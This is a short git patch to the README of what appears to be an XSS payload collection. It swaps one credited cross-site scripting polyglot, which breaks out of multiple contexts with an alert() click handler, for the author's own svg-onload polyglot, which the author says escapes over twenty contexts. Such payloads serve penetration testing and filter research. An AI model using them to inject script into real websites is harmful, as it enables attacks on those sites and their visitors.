From 14d12fd201278d4974b9a5b88644fe5b24bdd5c8 Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Wed, 31 Oct 2018 23:29:26 +0530 Subject: [PATCH] added XSS polyglot --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index de9b03d..43f0bd5 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,11 @@ Put this repo on watch. I will be updating it regularly. x ``` -Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/): +### Awesome Polyglots + +Here's an XSS polyglot that I made which can break out of 20+ contexts: ``` -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e +%0ajavascript:`/*\"/*--><svg onload='/*` ``` ### Awesome Tags & Event Handlers